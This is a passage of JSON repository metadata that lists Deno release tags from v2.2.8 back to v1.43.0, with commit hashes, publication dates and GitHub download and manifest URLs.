.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T